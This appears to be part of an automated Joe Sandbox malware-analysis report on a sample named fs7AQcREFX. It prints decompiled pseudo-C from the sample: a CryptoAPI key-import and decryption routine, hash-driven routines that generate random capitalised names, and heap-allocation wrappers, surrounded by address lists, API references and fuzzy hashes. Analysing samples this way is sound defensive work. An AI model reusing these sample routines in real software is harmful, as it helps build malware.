                                                                                                                                                                                                                                                                                          0x040081f1
                                                                                                                                                                                                                                                                                          0x040081fa
                                                                                                                                                                                                                                                                                          0x04008202
                                                                                                                                                                                                                                                                                          0x0400820e
                                                                                                                                                                                                                                                                                          0x04008219
                                                                                                                                                                                                                                                                                          0x04008227
                                                                                                                                                                                                                                                                                          0x0400822c
                                                                                                                                                                                                                                                                                          0x0400822c
                                                                                                                                                                                                                                                                                          0x04008202
                                                                                                                                                                                                                                                                                          0x040081e2
                                                                                                                                                                                                                                                                                          0x0400816b
                                                                                                                                                                                                                                                                                          0x04008134
                                                                                                                                                                                                                                                                                          0x04008233
                                                                                                                                                                                                                                                                                          0x04008240
                                                                                                                                                                                                                                                                                          0x04008240
                                                                                                                                                                                                                                                                                          0x04008233
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040080e5

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040080D8
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04008240
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008AD3
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: GetLastError.KERNEL32 ref: 04008ADD
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008B0C
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 04008B37
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008B5E
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 04008B7A
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDestroyKey.ADVAPI32(00000000), ref: 04008B87
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptDestroyKey.ADVAPI32(00000000), ref: 04008B91
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008B9D
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 040081F1
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$DecryptErrorFreeLastRelease
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 142027497-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 2080789f3f96790b22f6d08e37a4e2527d61b9d4c01572dffb2e446cb7e157f2
                                                                                                                                                                                                                                                                                          • Instruction ID: 586cb0610e47de0410656fb7eac1ad2d30ffe64d38e300cd8a2e1f05076280ab
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2080789f3f96790b22f6d08e37a4e2527d61b9d4c01572dffb2e446cb7e157f2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3551E7B5E00209AFEB14DF98D984BEEB7B5BB48304F14C158E905BB381D774AA40CB61
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                                                                                                                          			E04005930(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                                                                                                                          				void _v52;
                                                                                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                                                                                          				signed int _v60;
                                                                                                                                                                                                                                                                                          				void* _t70;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 > 0 && _a12 <= 0x10) {
                                                                                                                                                                                                                                                                                          					E04007B70( &_v24, _a4, 0x10);
                                                                                                                                                                                                                                                                                          					memcpy( &_v52, "abcdefghijklmnopqrstuvwxyz", 6 << 2);
                                                                                                                                                                                                                                                                                          					asm("movsw");
                                                                                                                                                                                                                                                                                          					asm("movsb");
                                                                                                                                                                                                                                                                                          					_v56 = 0;
                                                                                                                                                                                                                                                                                          					while(_v56 < _a12) {
                                                                                                                                                                                                                                                                                          						_v60 = (( *(_t70 + _v56 - 0x14) & 0x000000ff) + _v56 + 1) * (_v56 + 2) % 0x1a;
                                                                                                                                                                                                                                                                                          						_a8[_v56] =  *((intOrPtr*)(_t70 + _v60 - 0x30));
                                                                                                                                                                                                                                                                                          						if(_v56 == 0) {
                                                                                                                                                                                                                                                                                          							CharUpperA(_a8); // executed
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                                          						_v56 = _v56 + 1;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                                          0x04005938
                                                                                                                                                                                                                                                                                          0x04005943
                                                                                                                                                                                                                                                                                          0x04005971
                                                                                                                                                                                                                                                                                          0x04005986
                                                                                                                                                                                                                                                                                          0x04005988
                                                                                                                                                                                                                                                                                          0x0400598a
                                                                                                                                                                                                                                                                                          0x0400598b
                                                                                                                                                                                                                                                                                          0x0400599d
                                                                                                                                                                                                                                                                                          0x040059c6
                                                                                                                                                                                                                                                                                          0x040059d6
                                                                                                                                                                                                                                                                                          0x040059dc
                                                                                                                                                                                                                                                                                          0x040059e2
                                                                                                                                                                                                                                                                                          0x040059e2
                                                                                                                                                                                                                                                                                          0x040059ee
                                                                                                                                                                                                                                                                                          0x0400599a
                                                                                                                                                                                                                                                                                          0x0400599a
                                                                                                                                                                                                                                                                                          0x0400599d
                                                                                                                                                                                                                                                                                          0x040059fb

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CharUpperA.USER32(00000000), ref: 040059E2
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • abcdefghijklmnopqrstuvwxyz, xrefs: 0400597E
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CharUpper
                                                                                                                                                                                                                                                                                          • String ID: abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                                                                                                                                          • API String ID: 9403516-1277644989
                                                                                                                                                                                                                                                                                          • Opcode ID: 497a74bf9fc68f883eb5939cf665136b33a3e7b7514e3d025b1060dfed1370e2
                                                                                                                                                                                                                                                                                          • Instruction ID: f69ee34caa0c5af81cf691572c0dafb25cbc9a5132ff2a0986e08936ddab1125
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 497a74bf9fc68f883eb5939cf665136b33a3e7b7514e3d025b1060dfed1370e2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7210C35A06108EBEF04CF98D984BDDB7B6FF85315F248569E804A7280D375AA45CF41
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04009400(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                                                                                          				signed int _v32;
                                                                                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                                          				char _v91;
                                                                                                                                                                                                                                                                                          				char _v92;
                                                                                                                                                                                                                                                                                          				char _v220;
                                                                                                                                                                                                                                                                                          				intOrPtr _t59;
                                                                                                                                                                                                                                                                                          				void* _t103;
                                                                                                                                                                                                                                                                                          				void* _t104;
                                                                                                                                                                                                                                                                                          				void* _t106;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 > 0) {
                                                                                                                                                                                                                                                                                          					_t56 = E04007B70( &_v28, _a4 + 0x45b, 0x10);
                                                                                                                                                                                                                                                                                          					_t104 = _t103 + 0xc;
                                                                                                                                                                                                                                                                                          					_v12 = _v28 ^ _v24 ^ _v20 ^ _v16;
                                                                                                                                                                                                                                                                                          					_v32 = 0;
                                                                                                                                                                                                                                                                                          					while(_v32 < _a12) {
                                                                                                                                                                                                                                                                                          						E04007D20(_t56,  &_v220, 0, 0x80);
                                                                                                                                                                                                                                                                                          						_t59 = E04008BB0( &_v12, 4,  &_v220, 0x80); // executed
                                                                                                                                                                                                                                                                                          						_t106 = _t104 + 0x1c;
                                                                                                                                                                                                                                                                                          						_v40 = _t59;
                                                                                                                                                                                                                                                                                          						if(_v40 <= 0) {
                                                                                                                                                                                                                                                                                          							_v12 = _v32 * 7 + _v12;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_v12 = _v220;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v36 = _v12 % 4 + 9;
                                                                                                                                                                                                                                                                                          						E04009650( &_v220, _v40, _v32 * 0x1e + _a8, _v36);
                                                                                                                                                                                                                                                                                          						E04007D20( &_v92,  &_v92, 0, 0x32);
                                                                                                                                                                                                                                                                                          						_t104 = _t106 + 0x1c;
                                                                                                                                                                                                                                                                                          						lstrcpyA( &_v92, _v32 * 0x1e + _a8);
                                                                                                                                                                                                                                                                                          						_v91 = 0;
                                                                                                                                                                                                                                                                                          						CharUpperA( &_v92);
                                                                                                                                                                                                                                                                                          						 *((char*)(_a8 + _v32 * 0x1e)) = _v92;
                                                                                                                                                                                                                                                                                          						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                                          						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                                          						_t56 = _v32 + 1;
                                                                                                                                                                                                                                                                                          						_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                                                                          0x04009409
                                                                                                                                                                                                                                                                                          0x04009414
                                                                                                                                                                                                                                                                                          0x0400943d
                                                                                                                                                                                                                                                                                          0x04009442
                                                                                                                                                                                                                                                                                          0x04009451
                                                                                                                                                                                                                                                                                          0x04009454
                                                                                                                                                                                                                                                                                          0x04009466
                                                                                                                                                                                                                                                                                          0x04009480
                                                                                                                                                                                                                                                                                          0x0400949a
                                                                                                                                                                                                                                                                                          0x0400949f
                                                                                                                                                                                                                                                                                          0x040094a2
                                                                                                                                                                                                                                                                                          0x040094a9
                                                                                                                                                                                                                                                                                          0x040094bf
                                                                                                                                                                                                                                                                                          0x040094ab
                                                                                                                                                                                                                                                                                          0x040094b1
                                                                                                                                                                                                                                                                                          0x040094b1
                                                                                                                                                                                                                                                                                          0x040094d1
                                                                                                                                                                                                                                                                                          0x040094ed
                                                                                                                                                                                                                                                                                          0x040094fd
                                                                                                                                                                                                                                                                                          0x04009502
                                                                                                                                                                                                                                                                                          0x04009513
                                                                                                                                                                                                                                                                                          0x04009519
                                                                                                                                                                                                                                                                                          0x04009521
                                                                                                                                                                                                                                                                                          0x04009533
                                                                                                                                                                                                                                                                                          0x0400953c
                                                                                                                                                                                                                                                                                          0x04009545
                                                                                                                                                                                                                                                                                          0x04009460
                                                                                                                                                                                                                                                                                          0x04009463
                                                                                                                                                                                                                                                                                          0x04009463
                                                                                                                                                                                                                                                                                          0x04009466
                                                                                                                                                                                                                                                                                          0x04009553

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008BFF
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: GetLastError.KERNEL32 ref: 04008C09
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008C38
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 04008C59
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 04008C71
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 04008C99
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 04008CC1
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptDestroyHash.ADVAPI32(00000000), ref: 04008CD5
                                                                                                                                                                                                                                                                                            • Part of subcall function 04008BB0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008CE1
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 04009513
                                                                                                                                                                                                                                                                                          • CharUpperA.USER32(?), ref: 04009521
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Context$AcquireParam$CharCreateDataDestroyErrorLastReleaseUpperlstrcpy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2710640451-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 8d992d858b78b8c12e31d27f4ae823d4f8e581c9f8660fd8284da344811b5e85
                                                                                                                                                                                                                                                                                          • Instruction ID: bc5be7810042b5ebbd7ddf8470aca826c8a0736d185973949ab2100ea4ccd4f3
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d992d858b78b8c12e31d27f4ae823d4f8e581c9f8660fd8284da344811b5e85
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 564119B1D00208EBEB44DFD4C881BEEBBB5EF58308F10C15AD515BB281E774AA85CB91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 025521F9
                                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 0255223B
                                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000000E), ref: 0255228B
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719923860.0000000002551000.00000020.00001000.00020000.00000000.sdmp, Offset: 02551000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2551000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ErrorLast$HugeRead
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 100728148-0
                                                                                                                                                                                                                                                                                          • Opcode ID: bd8b22f61ee621192030e890070bbee12e8c9c4a47a42b654e44d04f9ec2a7df
                                                                                                                                                                                                                                                                                          • Instruction ID: 1f0e17a8b279d40910b8f061198aab44aa2342cb43dbeede1f679232e56953dd
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd8b22f61ee621192030e890070bbee12e8c9c4a47a42b654e44d04f9ec2a7df
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B01F674A00208EFDB00CF94C955BAEBBB1BF48314F208699E909AB240D734EA50DFA4
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E040097A0(long _a4) {
                                                                                                                                                                                                                                                                                          				void* _t4;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t4 = RtlAllocateHeap(GetProcessHeap(), 8, _a4); // executed
                                                                                                                                                                                                                                                                                          				return _t4;
                                                                                                                                                                                                                                                                                          			}




                                                                                                                                                                                                                                                                                          0x040097b0
                                                                                                                                                                                                                                                                                          0x040097b7

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,04009FB2,?,04009FB2,00000000,?,?,?,04009E2D), ref: 040097A9
                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,04009FB2,00000000,?,?,?,04009E2D), ref: 040097B0
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1357844191-0
                                                                                                                                                                                                                                                                                          • Opcode ID: e19e0248bdcccd87c05d7a61fb539eafc2efb7858191fd7307808dd8c9195d95
                                                                                                                                                                                                                                                                                          • Instruction ID: 51615621b5a1f832d01dc3b7a4cc229a82638b6a1205cca077e68d01418531cd
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e19e0248bdcccd87c05d7a61fb539eafc2efb7858191fd7307808dd8c9195d95
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93C09B71144308ABE6449FD8E80DD95375DE748601F004111B70DD6141CB7CAD84C762
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719923860.0000000002551000.00000020.00001000.00020000.00000000.sdmp, Offset: 02551000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2551000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 0583f872650ef7095681e39d4d2b7df6dbc4bbd3c19741fa1a0b115bddb9ff9a
                                                                                                                                                                                                                                                                                          • Instruction ID: 2883f3f8053f16a2516102f787a1f5ca77af1cb51931f949b3e914af6921807a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0583f872650ef7095681e39d4d2b7df6dbc4bbd3c19741fa1a0b115bddb9ff9a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2541C974A00519AFDB04CF44C4A4BAABBB2FF88314F24C55AEC1A5F355D775EA82CB84
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                                                                                                                          			E0010D312(signed int _a4, signed int _a8, long _a12) {
                                                                                                                                                                                                                                                                                          				void* _t10;
                                                                                                                                                                                                                                                                                          				long _t11;
                                                                                                                                                                                                                                                                                          				long _t12;
                                                                                                                                                                                                                                                                                          				signed int _t13;
                                                                                                                                                                                                                                                                                          				signed int _t17;
                                                                                                                                                                                                                                                                                          				long _t19;
                                                                                                                                                                                                                                                                                          				long _t24;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t17 = _a4;
                                                                                                                                                                                                                                                                                          				if(_t17 == 0) {
                                                                                                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                                                                                                          					_t24 = _t17 * _a8;
                                                                                                                                                                                                                                                                                          					__eflags = _t24;
                                                                                                                                                                                                                                                                                          					if(_t24 == 0) {
                                                                                                                                                                                                                                                                                          						_t24 = _t24 + 1;
                                                                                                                                                                                                                                                                                          						__eflags = _t24;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L5;
                                                                                                                                                                                                                                                                                          					L6:
                                                                                                                                                                                                                                                                                          					_t10 = RtlAllocateHeap( *0x171004, 8, _t24); // executed
                                                                                                                                                                                                                                                                                          					__eflags = 0;
                                                                                                                                                                                                                                                                                          					if(0 == 0) {
                                                                                                                                                                                                                                                                                          						goto L7;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L14:
                                                                                                                                                                                                                                                                                          					return _t10;
                                                                                                                                                                                                                                                                                          					goto L15;
                                                                                                                                                                                                                                                                                          					L7:
                                                                                                                                                                                                                                                                                          					__eflags =  *0x17166c;
                                                                                                                                                                                                                                                                                          					if( *0x17166c == 0) {
                                                                                                                                                                                                                                                                                          						_t19 = _a12;
                                                                                                                                                                                                                                                                                          						__eflags = _t19;
                                                                                                                                                                                                                                                                                          						if(_t19 != 0) {
                                                                                                                                                                                                                                                                                          							 *_t19 = 0xc;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t11 = E00108912(_t10, _t24);
                                                                                                                                                                                                                                                                                          						__eflags = _t11;
                                                                                                                                                                                                                                                                                          						if(_t11 != 0) {
                                                                                                                                                                                                                                                                                          							L5:
                                                                                                                                                                                                                                                                                          							_t10 = 0;
                                                                                                                                                                                                                                                                                          							__eflags = _t24 - 0xffffffe0;
                                                                                                                                                                                                                                                                                          							if(_t24 > 0xffffffe0) {
                                                                                                                                                                                                                                                                                          								goto L7;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								goto L6;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t12 = _a12;
                                                                                                                                                                                                                                                                                          							__eflags = _t12;
                                                                                                                                                                                                                                                                                          							if(_t12 != 0) {
                                                                                                                                                                                                                                                                                          								 *_t12 = 0xc;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t10 = 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L14;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t13 = 0xffffffe0;
                                                                                                                                                                                                                                                                                          					_t27 = _t13 / _t17 - _a8;
                                                                                                                                                                                                                                                                                          					if(_t13 / _t17 >= _a8) {
                                                                                                                                                                                                                                                                                          						goto L3;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(E00107A0D(_t27))) = 0xc;
                                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				L15:
                                                                                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                                                                                          0x0010d317
                                                                                                                                                                                                                                                                                          0x0010d31c
                                                                                                                                                                                                                                                                                          0x0010d339
                                                                                                                                                                                                                                                                                          0x0010d33e
                                                                                                                                                                                                                                                                                          0x0010d340
                                                                                                                                                                                                                                                                                          0x0010d342
                                                                                                                                                                                                                                                                                          0x0010d344
                                                                                                                                                                                                                                                                                          0x0010d344
                                                                                                                                                                                                                                                                                          0x0010d344
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010d34c
                                                                                                                                                                                                                                                                                          0x0010d355
                                                                                                                                                                                                                                                                                          0x0010d35b
                                                                                                                                                                                                                                                                                          0x0010d35d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010d391
                                                                                                                                                                                                                                                                                          0x0010d393
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010d35f
                                                                                                                                                                                                                                                                                          0x0010d35f
                                                                                                                                                                                                                                                                                          0x0010d366
                                                                                                                                                                                                                                                                                          0x0010d384
                                                                                                                                                                                                                                                                                          0x0010d387
                                                                                                                                                                                                                                                                                          0x0010d389
                                                                                                                                                                                                                                                                                          0x0010d38b
                                                                                                                                                                                                                                                                                          0x0010d38b
                                                                                                                                                                                                                                                                                          0x0010d368
                                                                                                                                                                                                                                                                                          0x0010d369
                                                                                                                                                                                                                                                                                          0x0010d36f
                                                                                                                                                                                                                                                                                          0x0010d371
                                                                                                                                                                                                                                                                                          0x0010d345
                                                                                                                                                                                                                                                                                          0x0010d345
                                                                                                                                                                                                                                                                                          0x0010d347
                                                                                                                                                                                                                                                                                          0x0010d34a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010d373
                                                                                                                                                                                                                                                                                          0x0010d373
                                                                                                                                                                                                                                                                                          0x0010d376
                                                                                                                                                                                                                                                                                          0x0010d378
                                                                                                                                                                                                                                                                                          0x0010d37a
                                                                                                                                                                                                                                                                                          0x0010d37a
                                                                                                                                                                                                                                                                                          0x0010d380
                                                                                                                                                                                                                                                                                          0x0010d380
                                                                                                                                                                                                                                                                                          0x0010d371
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010d31e
                                                                                                                                                                                                                                                                                          0x0010d322
                                                                                                                                                                                                                                                                                          0x0010d325
                                                                                                                                                                                                                                                                                          0x0010d328
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010d32a
                                                                                                                                                                                                                                                                                          0x0010d32f
